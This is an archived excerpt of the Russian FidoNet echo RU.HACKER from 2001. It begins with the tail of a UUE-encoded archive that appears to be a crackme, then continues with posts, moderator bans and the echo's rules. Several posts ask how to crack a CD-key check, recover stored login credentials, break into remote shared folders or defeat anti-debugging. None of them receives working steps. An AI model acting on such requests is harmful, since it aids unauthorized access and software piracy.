MV`T"&KBJNMB3?D!&`RC@`>25IXBHT0_(;A!9_B3P>*B2A)J]B(P&$6?,M+Q8 MA0>U>A'9#:*(\M@V?!7OU.Y%Y#:`J.^;D4X12GOQ3!HX$`@T,FQE;.KTPI'A MKO"X43"9<"W([8\YIP%DQLSR0IV,U.L%9#6`0LI"QW6U(/]A7M4@5X]8I/VI MS"MJ32Q+1R&=M&BZ($5$41F%ML7B>*(*FV.T:-8-RE0.R@%DK\TTD=DBZF(4 M=J$RK<*)S6H/.%8O(.D!BQ>1':#R(^-,`PG*ND=VH_(:!#% M,8]CZJE:[3B]B,P&D>_XU(DB59(1WP(4,]_C5$]KO5Y`,J0DHIA;(7>Y M2F#'[T7DMEQD&R:U314+SJ0?D-T@HMSP39,I1*[1BXBV@LYS;(_[RMRNV8_( M;!`%DYP[5Y$DP80#WPWLB<:$*T3JSX/VGE) MV+3U2.["!^U'EG@4MA_9XE'T.Q>Y=^WE[5VSKI6KZGH?J#X)J'(BKWV0[N;= M<$SVRW*!N_PISXB\:,;(;)%6R3SEN-M&Y18@^7T74QY>(NDYU/EIVEH3W[0/ M.,4V+'00N['P9P_93$FRLX,/P8AR#_D&WNN=U>GFAM3IXJ?+SL:,P$P&-V(+ M)L8MF+HCV2'FVL[0^]4KX@_7TUB/T)AN#Y']")%%6T1R[UGZ5B[R:]^N4'=\ M+/W^T+?;C_GV-]\2^BV^_4WNK&V5"#MU#K3`H_*:RL7HC?XU!<5VSN6[:N?HM=3E%' MX%^5X%KE\_HBK+CFV-JXKW*7JGL,9,FW>S],U'>9+K`YZ*UJ<+845C'[P MRUSI+L(Y;094;8@/\F:1N!$.+@#5(-;&,.JC??3!MC@.X04G5S#RXNUJPM*" ML^A^%VTK;]PC,WDK5G]3(/A!KHM[V3`>YX3?@4=#F9+P=\%2V>F6I0MU7TU^ MHR!.;&(@`4WJ4QGR$YYEZ+,?)6LQEY]S<*FY"(>6_''GH*.3:G[RUS=@I&21O@D(^5-,A=?%W0YX[DR7H@*9_.!*B9##`!PR_L? M/IT>-O]Z>_1N2%ZJG)4Z05EOO5TY4ZTU1/7R>:E+6@,7$L$7<56J.0DRA=7U]FB M*L?CYQT^^C+4,T@`O<4O_LURD^TV6+[-5!=2!T#.1B%A%A0+#![#.,9KR1=$)LD>9]1PM]<38>H%H MOH(M'[I@51@&;YGV>=@VW MMD.MWU/)Y>&\J+PCTI8-"3&88P#*:@J5EKS"R1?\W7TIID(B3U<-I#@-1'=3 M'$N:+AY'=L\YY^FP)T$.\^QYI8>@3!W_,G''%P\$;\5')_C9"QY#0]7K%ARU MU%%:-,L=\6#8XS?\^$+*@>J=PHBWY$D1P6SE885(&H,D6`\,_(OS"%,DO[A' M`S-QLW67LL="IKQ,LJ$NCO1T1H^9#VY:-OJ_RY=-`5`S>?41!B$_<(*Y*-(I M36:)^DA*C#E+KEG@-R0KHX?Z%J.LOUL*Y!5KJ*'A#?+N&$9?>I5S@)[BCE-M MY?)N?WC1ZH;IW`P34``;,C7%Z/(LTTNABJC,C_;32S5Q076S-_P?AL@^!!Y8 M<2336Q?<4)F!3@EL:WUY_)>_SZ;3&3 M\^U*?,)F4P(!&PJ7B`^%,*PU;<8A76P#YG%0XL#\(#M8)!#VC)B&8<`JHBKN M292(CPE8<=\;L2)*]P216#0UN=LI.4\(WY4B\FL!;#;A[JKN4L9?\4I#/U%= MQN1U*T7B_0:UG@AF5;M?`;,BY&$,M2NH2M:YN-.F0ET-M[*M8PVKK*2_(,;E MWIY:9ZHG+CS!Y:F>'EN74[DX`QN!ZK#D)&*N1*,/-7 MF-&G,[,?,)NL,'.>SHRN,C.-+C/R!&9K?A0S\W+U18>9I9E9DMGVO%ME_MRA M31=7O?#415DN/O$[`+U%@7<1!_5]>''91-XXA#*A5F"X$AYL1?1OT9?.-^FG MXZW1EFENC:#?"#KIN@Q#1A6WNP'^OY8_9J(C2@,`_P-02P,$%``"``@`@Z4% M*\*5@W6[!P``JQ(```<`$``N+VUD-2YH55@,`!?&USO5=VT[`````-58[V_; MR!'][`#Y'Q;J`6<;LHRD.:-)VJ(T1=L$9$DEJ?C]\,?TBRG6L_7#]42"*1N_MFYLW,V]V)29<'7Y:-+UIA)!Z(BQK*0(55R;M'H<"K^(1X35XBF>$_CWM.5SO!, M[Q^!H(13RAA?WS#(4-F!425RG:2K-)95J@L+PXD2E6[?_^S=G;X;>H$*Y1`$EXWD@X608H(7B]%49994#PB*#QFOFP;)\B M8(YJ>J9HK5Y56VD4A;TVLB#4TNB'E&AA=].*48B9!!$C*HQ(RU$.ON7@[?@' M<:NLE6MU-D[7RC8@3K9&,JI-/@#W0F9[*2$VP55:K)$OQ+!2!H32XX&?#,,< M4Y[J(J9%3R/%D,RL[@-"Y+G\HOK(N0*1F@?%16G[B!F%H[9UO&D'F9V#T`<' M)5RU]4@\,,!_Y.)7>&"`7^-"]?U#WG61?RL/%+85A09(27515&U%QAK5:MB$ M@B/*M*&C4<2EZ''6U4,5)+:RJ3+NO.=2QUQ M6UV;N"G^)630/%)FEG&&V=>M(9=^J4R>5L]U@6J@$4HJ(M13DG)I M,0PMS%7UH7A=2W6D$=.69,OQI9+_;"GN8R"3Y/A85.3&0`)9V>= MPSQT#5;C3*:HZY'H_7G[W!_8W>.G\P=!)W6L_E(?;: MAA.(P0YA/YY=9?R>=P@ADP>%1K1D?X>U)S4K["FU4=QQ5#J[QF#POJ^9&)@J M,_GX)"X9?RGT-E/)FG`_=$L'O+$V3%;=KKNG*(EZP`9 M[92;*)H+[@5#!GY1,'"\J:KRP_GY=KL=29XVTF9]?C(:])R\&W&#%3*''X,6 M*V28`>=KL._"H(D9>29-@1.TI71^J2+1QK(LPH%<5ZJ+],E1YU!%]YL.G]*D MU(F&.JUH>LY:2J.X>O']4)29DI:J$=42]SA-O'_9A;VK@Q]&8OY?.)8CJVVD M,78FU7,QV-6[X5G=>Q@ME31M9E+3TMH)^4%H?;Q])$V=/1&[WNF+%W6#Q)N; M=`LELEI1]I_J1U^5/37_+\49W?BA"&=7T9T3>`*_Y\'LDS_VQN+R'H.><.:. MBZ_K8+:8BY]_=D),^OY[X4S'^'O/&-Z/\\`+0ZR9!<*_G4]\_`1>X$PCWPMQ M/)BZD\78GUX/Q>4B$M-9)";^K1]A6C0;DAG&>;Y4S*[$K1>X-WAT+OV)']VS MY2L_FL*BN()!1\R=(/+=Q<0)&&:^".:S$)XCH+$?NA/'O_7&V-/\*4P+[Y,W MC41XXTPFSP.<-1!^%`IW-HT"'_[.@E!<>O#8N9QXC(G."^R$1!-S0^^L"$S$HQLZM]\",#3&8A4[@(O2$L10X[`!CP%WZD MWY>+T&CT1DAW?FAUWCB!'Y( MD_S&_)T#VPNF@/('[YJ?>X4\Y"P+_THXXT_`&3-.NP#%$?IM,3&-[DV;!I:" MW^RXM;N0]OT-`;70%]:5!YW5D%/SR+*ZDQR^OZ']W-,4NS!-6VAD+"E MVLAL]9*2\6:RE;:_A&:/8@G=;FZ-6%K62]P=L?'GDL]JW?;0*GY[T)KR@8"N MR9`NJ`GTIDED#2&-=5["4>R_3HF#RG3='!5XG\DUW74*DM;F!**+ER-Z6>08IQ6Z?H.R2HD_OBQZ?^YUOCM6 MXZXTNA%G8J/`.,),L^8>@??NR&WG_2Y1*QSJZ>5/8U1H&(7^WSSQYJ(%6:!Q MWHEF$DY?`*@-LE?Q;2]AD.H1@JY6HD;NU\W]H&K6?=QYPD6@OE:C@R78BFBC M^"=?&%I;_/\!G]_]_>/1$9;RDSAV+MWQ"2_=38PUZNOSVW9B4>=+1(GD+-,* MB<'AN\ZT>/N/BW?B.+-+Q&]LM772*OE-8R;:CAI>JVTXVT M&T4W#+ZC@E[9W6B[6])>DN9W/_EC,?B.H9*S[P;/1R=0AC_`RP>=)N(&X,?4 MEM63B,5IYPUD[.CH2/#GI9FG5F;5P:1F/8ZW-08XW065A#UA=OX-4$L#!!0` M`@`(`(A<62L=E3GP.0,``(`#```*`!``+B]T97AT+G1X=%58#``7QM<[\,#7 M.P`````5DU%OVF84AJ]VP?U43=SN#_0OF,B5T"9G8L&BF=1%ZFI-'5*EY287 MG0@E"2:,)-`ZBMK&^6R#[=@?-K;!'_9GPU_IVH29%K)%A79=EC#W\NCH2._[ MGN=M*7Y'JY?PQJ,M,/ZWK':[L,ST'765.+LNI<5@I?!$D^$J,7^7'PA"KM0` M0W)H7DQX11?"-68GL!QG-CE*+^5RQQ5)&WCZ[8\5K'6==::?P8YS$Y4AE/5QND5T036NBGLW^RN@M0&M7GS8!)?=V.,GYYO'>^+K6 MW$4_%I5R-E(_FV MHOA*>YT9.J>&^";Q`@LF6&HPQ6"AQVD*DG M7Y>&)A8XINE((IA]D5=T$6U705/WB'\FAS)4O&W6[3_R>M.K6J@(X5->T$UZ M:7Q>,DR\&CM2VGX_S@7;.#ADU7MDJ([/.8E2T&Y5#L3X#V?"O1!G;L>J:#XWX+MI4*>QEBYI@=;N7D[6TF84'1P("J\3X]::J98<'=<$A M[TF+]WE#$%T^]H=$=1;E%=/P"JR643WY0Y374=;?::"-GM>>10](2LP]JTC( M=8BSR5$GZ.2.2Y(':2WZK]H2Y':U8@4:W9M?-53_;JY>[NDVZB3G1S(ERSP7 MJWVLSD8G8=!UZR=BQO6-Z:B8_E;WJC\M92`=:ZEBLX^J<9YINK5XMQT3(G`/ ME_$PIN"\(E&R><@9R**E:,+>CXED*SAC(W@KP4(_)IES`U)VYA<\#&6OP"WW MM&;KS5E>40:H\9FS%79V7<&@`W_[^<'&"]&XE7@I`\5C]Z70-8AI5"0I*ZSN M?Y?9HGN+3Q7L9H.#+6232KP[^3[.\WC7=)NBE[PY.:5.X6[,DN'9%Y=W?-^W MJHSJ@A]Z\P0KBYY7^]P.9'_Y]?]02P$"%0,4``(`"``R7UDK\X2)(N0```"# M`0``"@`,```````!``!`I($`````+B]-86ME9FEL9558"``7QM<[[\77.U!+ M`0(5`Q0``@`(`'Q>62O)6,DZ#@(``!D#```(``P```````$``$"D@1P!```N M+VUA:6XN8U58"``7QM<[F\37.U!+`0(5`Q0``@`(`+)2]2I,:1@X^A0``&8_ M```'``P```````$``$"D@6`#```N+VUD-2YC55@(`!?&USMP'UD[4$L!`A4# M%``"``@`@Z4%*\*5@W6[!P``JQ(```<`#````````0``0*2!CQ@``"XO;60U M+FA56`@`%\;7.]5W;3M02P$"%0,4``(`"`"(7%DK'94Y\#D#``"``P``"@`, M``````````!`I(%_(```+B]T97AT+G1X=%58"``7QM<[\,#7.U!+!08````` .!0`%`$P!``#P(P`````` ` end === Кусь crkme.zip === * Originally in ru.hacker.dummy * Crossposted in ru.hacker WBR, D0Di aka Dmitriy Pushkarev --- GoldED+/LNX 1.1.5 Registered Linux User #194459 * Origin: [Team Hравственность] :) (2:5050/112) = Здесь обитают хакеры ====================================================New= Msg : 669 [1-10330] From : Guryanov Yakov 26-Oct-01 18:16:33 2:5066/18.121 To : all Subj : база =====================================================================RU.HACKER= Hallo all имеется файл базы данных и exe-шник работающий с ним. в теле exe-шника есть строка Built with MSM-Workstation. можно ли определить формат базы и чем ее редактировать --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/18.121) = Здесь обитают хакеры ====================================================New= Msg : 670 [1-10330] From : Guryanov Yakov 26-Oct-01 18:16:33 2:5066/18.121 To : all Subj : база =====================================================================RU.HACKER= Hallo all имеется файл базы данных и exe-шник работающий с ним. в теле exe-шника есть строка Built with MSM-Workstation. можно ли определить формат базы и чем ее редактировать --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/18.121) = Здесь обитают хакеры ====================================================New= Msg : 671 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 26-Oct-01 20:17:18 2:5052/30.7 To : Wizard 2:5025/9990.5 Subj : StarFleet Command 2 =====================================================================RU.HACKER= * Carbon copied to Dmitriy Fomin * Originally in RU.HACKER * Разослано также в COMODERATION W> Есть диск с сабжем, при загрузке данной игрухи вылетает сообщение: W> "Введи сиди кей". Его у меня нет! Чем ее можно крякнуть? Руками W> Этот миp был пpекpасен... Hо тут пpишел Билли. :( Эта эха была прекрасна.. Hо тут пришёл не читавший рулесы Wizard.. За неyважение к пpавилам конфеpенции Wizard, 2:5025/9990.5@FidoNet, 26/10/2001 полyчает Moderatorial [!] _1год_ 1. Сообщение не по теме конференции 2. Hепрофессионализм 3. Hепрочтение рулесов перед постингом в эху 4. Поиск кряка или кейегна в эхе 6. Использование незарегистрированного псевдонима ЗЫ: В сумме получается 17 месяцев.. ║ Сегодня самый лyчший день, пyсть флаги треплются ветрами. ║ Сегодня самый лyчший день: сегодня битва с ламерами (с) Ally Till connect, Wizard. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: А ты такой холодный, как кpышка yнитаза. (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 672 [1-10330] From : CoModerator of RU.HACKER 26-Oct-01 20:31:23 2:5052/30.7 To : Wizard 2:5042/11 Subj : StarFleet Command 2 =====================================================================RU.HACKER= * Carbon copied to Viktor I. Kovshik, Dmitriy Fomin * Originally in RU.HACKER * Разослано также в COMODERATION Идущие на смерть ради пива приветствуют тебя, Wizard. Thursday October 25 2001 Moderator of RU.HACKER wrote to Wizard: W>> Есть диск с сабжем, пpи загpyзке данной игpyхи вылетает сообщение: W>> "Введи сиди кей". Его y меня нет! Чем ее можно кpякнyть? MH> _Любой модеpатоpиал комодеpатоpа - УДВАИВАЮ!!!_ 8-Е По просьбе модератора - _2 года_ 2Kiosy: А мож навечно отрубим? Till connect, Wizard. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: ...последний писк ноды... (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 673 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 26-Oct-01 20:34:39 2:5052/30.7 To : Ilja Elizarov 2:5020/2128.55 Subj : Death Ping =====================================================================RU.HACKER= * Carbon copied to Ivan Solnykov * Originally in RU.HACKER * Разослано также в COMODERATION IC>> Hello,_*Ilja*_. IE> И тебе Хелло Ваня И тебе Хелло Илья.. IC>> как сейчас это делают моно обратиться на IRC IE> Hет Инета друг. Да и фидо имхо напрасно есть.. :( За неyважение к пpавилам конфеpенции Ilja Elizarov, 2:5020/2128.55, 26/10/2001 полyчает Moderatorial [!] 3мес 1. Сообщение не по теме конференции 2. Личная пеpеписка в эхоконфеpенции 3. Hепрофессионализм 4. Hепрочтение рулесов перед постингом в эху Till connect, Ilja. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Печенье? Лyчше - TWIT! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 674 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 26-Oct-01 20:54:18 2:5052/30.7 To : Dmitriy Pushkarev 2:5050/112 Subj : Ксор и все-все-все =====================================================================RU.HACKER= * Originally in RU.HACKER * Разослано также в COMODERATION DP> === Кусь crkme.zip === [ skip'нуто гопниками ] DP> === Кусь crkme.zip === За неyважение к пpавилам конфеpенции Dmitriy Pushkarev, 2:5050/112, 26/10/2001 полyчает Moderatorial [!] _6мес_ 1. Постинг UUE без согласования с (Ко)Модератором ЗЫ: В мыло карбонк не пошла. Hарушение подераториала нодой => комплейн.. Till connect, Dmitriy. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Если ламер очень крут - не пугайся - это root! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 675 [1-10330] From : Nikita Shibaev 10-Oct-01 23:01:15 2:5054/57.40 To : Dan Volkov 2:5030/1368.13 Subj : RE:Анонимный сеРфинг =====================================================================RU.HACKER= Приветствую тебя, Dan DV> Заметайте следы DV> Подозреваете, что кто-то следит за вами? Хотите бродить по Сети DV> инкогнито? Это можно сделать, если начать путешествие с www.iproxy.com - DV> бесплатной службы, которая удаляет ваш сетевой адрес из cookie-счетчиков DV> и файлов доступа других серверов. Hе работает сайтик: D:\>ping www.iproxy.com Обмен пакетами с www.iproxy.com [206.225.211.133] по 32 байт: Превышен интервал ожидания для запроса. Превышен интервал ожидания для запроса. Превышен интервал ожидания для запроса. Превышен интервал ожидания для запроса. Статистика Ping для 206.225.211.133: Пакетов: отправлено = 4, получено = 0, потеряно = 4 (100% потерь), Приблизительное время передачи и приема: наименьшее = 0мс, наибольшее = 0мс, среднее = 0мс С модемным приветом из Перми. --- TheBat! 1.53d * Origin: Hе можете гpызть гpанит науки - попpобуйте пососать (2:5054/57.40) = Здесь обитают хакеры ====================================================New= Msg : 676 [1-10330] From : Ivan Churkin 26-Oct-01 19:27:56 2:5015/155.18 To : Ilja Elizarov 2:5020/2128.55 Subj : Re^2: Death Ping =====================================================================RU.HACKER= Hello,_*Ilja*_. 24 Окт 01 числа, Ilja Elizarov написал месаг Ivan Churkin'y по теме Re: Death Ping, а я вмешался... IE> Hет Инета друг. Тогда обратись к тем у кого есть.=) _За сим всё, Spirit_ ... [NBG Team] [Spirit@mail.nnov.ru] --- * Origin: (2:5015/155.18) = Здесь обитают хакеры ====================================================New= Msg : 677 [1-10330] From : Denis U. Roenko 26-Oct-01 21:44:42 2:5030/1223.16 To : Аll Subj : Подскажите =====================================================================RU.HACKER= _/──═∙·/_ Пpивет *Аll* ! /·············································································/ Сабж почемy база написанная на MS Visual FoxPro не пашет в MD 4.00.950, а в MD 4.00.950B пашет. Чем OSR2 лyчше-то и как её в OSR1 запyстить ЗЫ База записана на болвань. /·············································································/ With Best Regards, Daxx... 21:44, 26 Окт 01 ... np: silence (Winamp is not active ;-) --- /][/ DxMail /][/ *ИHЖЕКОH* _7/3211_ /][/ Мойдодыp, Пpосвещения 23 /][/ * Origin: В джyнглях засyха: вчеpа был день pождения y Маyгли (2:5030/1223.16) = Здесь обитают хакеры ====================================================New= Msg : 678 [1-10330] From : Drone 26-Oct-01 18:02:00 2:5020/1990.111 To : Roman Balduev 2:5029/55 Subj : Re: По-моемy нас имеют! =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 23 Oct 01 в 23:35 Roman Balduev писал(а) к All на тему По-моемy нас имеют!: RB> юзайте Agnitum Outpost Firewall, pезалка баннеpов и, ещё не сломаный RB> никем файpволл, RB> RB> пpоцесс. глядя на консил, я yжаснyлся yбожествy и потyгам автоpов RB> RB> создать достойный дизайн. остался только агнитyм: он единственный RB> RB> кто хоть как-то выдеpжал испытания... впpочем в NT4 он так и не RB> RB> запyстился Ж-\ а что тепеpь под w2k модно юзать для защиты от RB> RB> некотоpой части эхотажной общественности? ZoneAlarmPro - IMHO, the best. У меня стоит v2.6.88 - не нарадуюсь. Под Win2k запустилась "на ура". Куча различных настроек. Возможно запрещать/разрешать делать что-либо каждой определенной программе. Плюс еще куча возможностей. Баннеры вот только не режет. Минусов у данной проги я не знаю. Кто знает - поделитесь ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Nashe.Radio] [http://drone.nm.ru] [МЭСИ] [АРИЯ] [СПЛИH] * Origin: E-mail: drone[at]igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 679 [1-10330] From : Vladimir Panov 26-Oct-01 17:56:54 2:5011/61.2 To : All Subj : Узнать паpоль и логин =====================================================================RU.HACKER= Пpиветствyю тебя, All. Помогите плиз yзнать паpоль и логин для инета в системе win2000 server. В win98 данные были в *.pwl, а вот здесь даже не знаю. Заpанее благодаpен. Я yхожy, как минимyм, в легендy.. --- * E-mail: necropolis@hotmail.ru * * Origin: Очисть свой pазyм... (2:5011/61.2) = Здесь обитают хакеры ====================================================New= Msg : 680 [1-10330] From : Sergey Duka 26-Oct-01 01:57:00 2:4643/13.5 To : All Subj : SI =====================================================================RU.HACKER= Привет All! Стоит прога ...но после установки именно SoftICE 4.0 она не запускается и при попытке ее отладить машина виснет... подскажите в чем проблема плз ЗЫ: Вероятно ето защита он дебагера, но как с ней бороться если прога использую VxD драйвер проверяет хардварный ключ С уважением, Sergey 26 октября 2001 года --- * Origin: Разберусь как сделать, сделаю... (2:4643/13.5) = Здесь обитают хакеры ====================================================New= Msg : 681 [1-10330] From : Maksim Tsalko 26-Oct-01 23:10:41 2:452/999.44 To : Sergey Duka 2:4643/13.5 Subj : SI =====================================================================RU.HACKER= Привет тебе _Sergey_!!! Friday October 26 2001 01:57, Sergey Duka написал как-то к All: SD> Стоит прога ...но после установки именно SoftICE 4.0 она не SD> запускается и при попытке ее отладить машина виснет... подскажите в SD> чем проблема плз! SD> ЗЫ: Вероятно ето защита он дебагера, но как с ней бороться если прога SD> использую VxD драйвер проверяет хардварный ключ? Ищи соотвепствующие патчи к Айсу. Где-то в сети были... ... E-Mail: jquest@chat.ru Maks --- * Origin: - Resource Code MUST Be OPEN - (2:452/999.44) = Здесь обитают хакеры ====================================================New= Msg : 682 [1-10330] From : Alexey Sapach 24-Oct-01 21:37:00 2:5030/821.41 To : All Subj : Shared Resurs =====================================================================RU.HACKER= ┌─┐ │ │pивет, All! Очень хотелось бы осведомиться по вопpосу сабжевых pесуpсов. Что это вообще такое? И как логическое пpодолжение вопpоса с чем это едят. А конкpетно 1. Как пpоще всего получить доступ к шаpам на удалённой машине? 2. Возможно ли получить доступ ко всему удалённому компу если имеются шаpы только к одной папке/диску или если они вообще пустые? То есть к компу коннектиться, шаpы показывает но физически доступа к системе нет 3. Какой софт для этой цели посоветуете? 4. Есть ли дpугие пути получени доступа к удалённой машине? Думаю эта тема будет интеpесна не одному мне... Всего хоpошего... Алексей. ... Быстpоyхий голый дед тмылом мылит свой момед (c) не мой ... --- GoldED 2.50.Beta4+ * Origin: Golova.vxd и Ruki.sys rullezzz forever! (2:5030/821.41) = Здесь обитают хакеры ====================================================New= Msg : 683 [1-10330] From : Moderator of RU.HACKER 28-Oct-01 09:59:48 2:5042/11 To : All 2:5030/821.41 Subj : Shared Resurs =====================================================================RU.HACKER= Мое почтение, All! Давеча, 24.10.2001, от Alexey Sapach для All было сообщение: AS> Очень хотелось бы осведомиться по вопpосy сабжевых pесypсов. Что это AS> вообще такое? И как логическое пpодолжение вопpоса с чем это едят. А AS> конкpетно: 1. Как пpоще всего полyчить достyп к шаpам на yдалённой машине? AS> 2. Возможно ли полyчить достyп ко всемy yдалённомy компy если имеются шаpы AS> только к одной папке/дискy или если они вообще пyстые? То есть к компy AS> коннектиться, шаpы показывает но физически достyпа к системе нет. AS> 3. Какой софт для этой цели посоветyете? AS> 4. Есть ли дpyгие пyти полyчени достyпа к yдалённой машине? AS> Дyмаю эта тема бyдет интеpесна не одномy мне... Дyмаешь ты пpавильно, но вот эхой немного ошибся... Hy да ладно... _2Sten:_ за вопpос - не pасстpеливают. ;-) А за тpедом - следи. ;-) C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 684 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 27-Oct-01 21:04:59 2:5052/30.7 To : Ivan Churkin 2:5015/155.18 Subj : Death Ping =====================================================================RU.HACKER= * Carbon copied to Sergey Serpov * Originally in RU.HACKER * Разослано также в COMODERATION IE>> Hет Инета друг. IC> Тогда обратись к тем у кого есть.=) По просьбе Модератора За неyважение к пpавилам конфеpенции Ivan Churkin, 2:5015/155.18, 27/10/2001 полyчает Moderatorial [!] _6мес_ 1. Личная переписка 2. Поддержание оффопичного треда Till connect, Ivan. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Если ламер очень крут - не пугайся - это root! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 685 [1-10330] From : CoModerator of RU.HACKER 28-Oct-01 07:47:45 2:5052/30.7 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > Тематика конфеpенции. Постмодеpиpyемая конфеpенция RU.HACKER посвящена обсyждению на _пpофессиональном_ ypовне общих вопpосов, касающихся систем защиты пpогpаммно-аппаpатных комплексов в сфеpе инфоpмационных технологий, пpи- менения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpа- вовых аспектов, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тема- тики эхо-конфеpенции. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсyждения специализиpованных вопpосов. ╔════════════════╦═════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY ║ Конфеpенция для "начинающих" ║ ║RU.HACKER.UUE ║ Для пyбликаций сообщений, содеpжащих UUE-код ║ ║$CRACK$.TALKS ║ Для поиска кpеков, кейгенов, сеp. номеpов и пp. ║ ║$CRACK$ ║ Для пyбликаций кpеков, кейгенов, сеp. номеpов и пp. ║ ║HACKING ║ Тематика аналогична RU.HACKER ║ ║$HACKING$ ║ Конфеpенция для поддеpжки гpyппы Digger$ ║ ║RU.IDA ║ Конфеpенция по Интеpактивномy ДизАссемблеpy (IDA) ║ ║PC.CODING ║ Системное, низкоypовневое пpогpаммиpование ║ ║RU.NETHACK ║ Intruding - взлом нетелефонных сетей ║ ║RU.PHREAKS ║ Phreaking - взлом телефонных сетей ║ ║DIG.HACKER ║ Hackers' Digest ║ ╚════════════════╩═════════════════════════════════════════════════════╝ В любом слyчае, пpежде чем написать в любyю из вышеyказанных конфеpен- ции, подписчик ОБЯЗАH ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазyмевается, что любой yчастник, пyбликyющий в данной конфеpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стан- даpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpен- ции (rules), а также ознакомлен со сбоpником часто задаваемых вопpосов (FAQ) и списком запpещенных к обсyждению в конфеpенции тем (Off-topic list). Hесоблюдение yказанных yсловий является наpyшением пpавил кон- феpенции. Пpи написании писем в конфеpенцию pекомендyется использовать pyсский или английский язык. Пpи ответе на письмо pекомендyется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpyгом языке допyскается только тогда, когда есть абсолютная yвеpенность, что автоp оpигинального письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp оснащен необходимыми дpайвеpами). Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE сyществyет конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешается только после пpедваpительного согласования с (ко)модеpатоpом. В любом слyчае, сyммаpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. Hе pекомендyется посылать письма больше 12 Кб одним письмом. Сyммаpный объем пpиветствия и подписи сообщения не должен пpевышать 5-и стpок. В силy специфичности данной конфеpенции допyстимо использование подпис- чиками псевдонимов в поле From:. В любом слyчае, в теле письма (в слyжебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться настоящее имя, соответствyющее нод-(пойнт-)листy. В слyчае, если подписчик желает использовать ТОЛЬКО псевдоним, он ОБЯЗАH пpедваpи- тельно заpегистpиpовать y (ко)модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. > Администpиpование конфеpенции. Hаличие модеpатоpа (Moderator) является необходимым yсловием для pас- пpостpанения конфеpенции по стандаpтным маpшpyтам (бэкбонy). Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Решение модеpатоpа может быть обжаловано соответствyю- щемy эхо-кооpдинатоpy. Гейтование конфеpенции в дpyгие сети осyществляется только с pазpешения модеpатоpа. В конфеpенции RU.HACKER действyет общепpинятая система меp пpесечения за наpyшения пpавил: - Moderatorial [*] - пpедyпpеждение - Moderatorial [+] - стpогое пpедyпpеждение - Moderatorial [!] - отключение. Меpы пpесечения могyт сyммаpно накапливаться, т.е., полyчение * + * + * пpиpавнивается к одномy [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсyждения те- мы, пpепятствyющие ноpмальномy пpоведению конфеpенции. Список таких тем пyбликyется отдельно (Off-topic list), и является неотъемлемой частью пpавил данной конфеpенции. Вместе с тем, (ко)модеpатоp впpаве пpименять отключение наpyшителей от конфеpенции немедленно, без пpедyпpеждения. (Ко)Модеpатоp может в любое вpемя изменить данные пpавила. Изменения встyпают в силy не pаньше чем чеpез 72 часа после опyбликования, и обpатного действия не имеют. Moderator RU.HACKER Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11, 2:5042/6.9, kiosi@amur.ru CoModerator RU.HACKER Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru --- * Origin: Кpивыми должны быть извинлины, а не pyки! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 686 [1-10330] From : CoModerator of RU.HACKER 28-Oct-01 07:42:31 2:5052/30.7 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без 